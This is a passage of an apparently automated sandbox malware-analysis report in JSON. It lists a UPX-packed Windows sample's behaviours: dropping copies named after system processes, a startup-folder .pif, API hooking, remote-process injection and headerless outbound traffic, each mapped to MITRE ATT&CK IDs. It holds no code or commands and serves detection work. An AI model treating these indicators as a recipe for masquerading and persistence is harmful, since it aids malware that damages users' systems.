"T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005284]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00003924]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00003924]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4K51K4\\New Folder.exe]- [targetUID: 00000000-00005284]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005284]\n \"SERVICES .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003924]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9DCB2.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00003924]\n \"IEXPLORER.EXE.67A9C389.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005284]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00003924]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005284]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005284]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005284]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DCF1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9DDC9.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00003924]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9C387.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"IExplorer.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES .exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9DCB2.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C389.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has a section named \"UPX0\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has a section named \"UPX1\"\n \"services.exe\" has a section named \"UPX0\"\n \"services.exe\" has a section named \"UPX1\"\n \"shell.exe\" has a section named \"UPX0\"\n \"shell.exe\" has a section named \"UPX1\"\n \"4k51k4.exe\" has a section named \"UPX0\"\n \"4k51k4.exe\" has a section named \"UPX1\"\n \"IExplorer.exe\" has a section named \"UPX0\"\n \"IExplorer.exe\" has a section named \"UPX1\"\n \"New Folder.exe\" has a section named \"UPX0\"\n \"New Folder.exe\" has a section named \"UPX1\"\n \"Data HAPUBWS.exe\" has a section named \"UPX0\"\n \"Data HAPUBWS.exe\" has a section named \"UPX1\"\n \"SERVICES .exe\" has a section named \"UPX0\"\n \"SERVICES .exe\" has a section named \"UPX1\"\n \"Empty.pif\" has a section named \"UPX0\"\n \"Empty.pif\" has a section named \"UPX1\"\n \"SERVICES.EXE\" has a section named \"UPX0\"\n \"SERVICES.EXE\" has a section named \"UPX1\"\n \"SMSS.EXE\" has a section named \"UPX0\"\n \"SMSS.EXE\" has a section named \"UPX1\"\n \"LSASS.EXE\" has a section named \"UPX0\"\n \"LSASS.EXE\" has a section named \"UPX1\"\n \"4K51K4.EXE.67A9DCB2.bin\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToLocalFileTime\" with parameter D#- & 448bf13a9c7bdb01 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToLocalFileTime\" with parameter fd2ba5919c7bdb01 & fd9369f3a47bdb01 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToLocalFileTime\" with parameter &9 & &r (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FileTimeToLocalFileTime\" with parameter n? & 6ea7789ca77bdb01 (UID: 00000000-00005284)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005284)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"OpenMutexW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\share\\4K51K4\\New Folder.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"K:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"L:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"M:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"N:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"O:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"P:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"Q:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"R:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"S:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"T:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"U:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"V:\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" (UID: 00000000-00005284)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003876)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004088)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002340)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005116)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003924)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005476)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005184)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005260)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005816)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005608)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005376)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005912)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004192)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005396)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006052)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005696)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005820)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003336)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003160)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005692)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004340)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005748)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004240)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003700)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005652)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005480)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005040)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005280)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005364)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004108)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005560)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004332)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003304)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003992)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002384)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005532)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005556)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005864)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002416)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005740)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005488)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002760)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002512)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003492)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004016)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004444)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003136)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004472)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004184)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" allocated memory in \"C:\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n 